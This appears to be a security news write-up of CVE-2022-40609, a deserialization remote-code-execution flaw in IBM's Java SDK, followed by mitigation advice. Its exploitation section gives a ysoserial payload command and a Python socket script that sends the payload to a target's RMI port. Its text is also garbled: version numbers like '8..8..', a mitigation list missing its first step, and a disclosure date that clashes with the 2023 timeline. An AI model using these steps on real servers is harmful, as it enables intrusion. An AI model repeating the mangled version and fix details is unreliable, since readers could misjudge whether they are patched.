CVE CyberSecurity Database News

CVE-2022-40609 - Remote Code Execution in IBM SDK, Java Technology Edition via Unsafe Deserialization

Poster -

In September 2022, IBM publicly disclosed CVE-2022-40609, a serious vulnerability in their IBM SDK, Java Technology Edition versions 7.1.5.18 and 8..8.. This flaw allows remote attackers to execute arbitrary code on servers through unsafe deserialization.

This long read aims to break down how CVE-2022-40609 works, how it can be exploited, if you're at risk, and what you can do to stay protected.

What is Unsafe Deserialization?

Java's serialization mechanism converts objects into byte arrays (serialization) and can reconstruct them later (deserialization). If deserialization happens on untrusted data, a maliciously crafted stream can cause the Java Virtual Machine (JVM) to instantiate and execute arbitrary classes — a known attack surface. Learn more from OWASP - Deserialization of Untrusted Data.

Official IBM Advisory:

- IBM Security Bulletin for CVE-2022-40609

How Does The Exploit Work?

IBM’s Java SDK had a flaw where it would deserialize objects sent over the network without checking if the data was trustworthy or filtering dangerous classes. If someone sends a specially-crafted payload over an application using this SDK (for example, via HTTP, RMI, or SOAP web service), the SDK could instantiate classes present in the JVM or available classpath, leading to arbitrary code execution.

1. Find an exposed endpoint accepting serialized objects.

A typical example is a Java application that accepts serialized objects in an RMI server, HTTP post body, or custom TCP protocol.

2. Generate a malicious serialized payload.

Attackers use gadgets (harmless classes in Java libraries with methods that do something unsafe when instantiated) to form a chain. One tool for this is ysoserial.

Example: Create a payload to run a command (calc.exe on Windows) using the CommonsCollections gadget.

java -jar ysoserial.jar CommonsCollections1 'calc.exe' > exploit_payload.ser

3. Send the payload to the vulnerable service.

This can be done using various scripting or networking tools. For example, using Python's socket library to send the data if the service listens on a TCP port:

import socket

with open('exploit_payload.ser', 'rb') as f:
    payload = f.read()

s = socket.socket()
s.connect(('target-ip', 1099))  # Example port for RMI
s.sendall(payload)
s.close()

Java Deserialization Exploit Skeleton

Below is a simplified code snippet that demonstrates how deserializing untrusted data could be exploited:

// DO NOT use deserialization on untrusted data!
import java.io.*;

public class UnsafeDeserializeDemo {
    public static void main(String[] args) throws Exception {
        // Simulate receiving this from the network!
        byte[] maliciousData = receiveMaliciousPayload();

        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(maliciousData));
        Object obj = ois.readObject(); // This line can lead to arbitrary code execution!
    }

    static byte[] receiveMaliciousPayload() {
        // Placeholder: in real attacks, this data comes from the attacker.
        return ...;
    }
}

Are you running IBM SDK, Java Technology Edition 7.1.5.18, 8..8., or prior?

- Does your application deserialize Java objects sent over the network from outside your trust boundary?
- Is your Java application using frameworks known for deserialization risks (like RMI, JMS, some SOAP libraries)?

Java 8: 8..8.1 or above

Download the fixed versions from IBM

2. Never Deserialize Untrusted Data

If you must use serialization for external data, use an allow-list of safe classes or switch to safer formats like JSON.

3. Use Java's Serialization Filtering (Java 9+)

Set the system property or security manager to filter which classes can be deserialized.

System.setProperty("jdk.serialFilter", "maxdepth=5;maxarray=400;java.base/*;!*");

4. Run Java with Least Privilege

Limit access and permissions wherever possible.

References and Further Reading

- IBM Security Bulletin: CVE-2022-40609
- NVD Details: CVE-2022-40609
- OWASP: Deserialization of Untrusted Data
- "Java Unmarshaller Security - The Forgotten Attack Surface"

Conclusion

CVE-2022-40609 is a critical reminder: *never trust serialized data from outside*. If you run IBM Java SDK versions 7.1.5.18 or 8..8., you’re in the crosshairs for remote attacks. Patch now, audit your code for insecure deserialization, and always use secure coding and deployment practices.

Timeline

Published on: 08/02/2023 15:15:00 UTC
Last modified on: 08/07/2023 16:10:00 UTC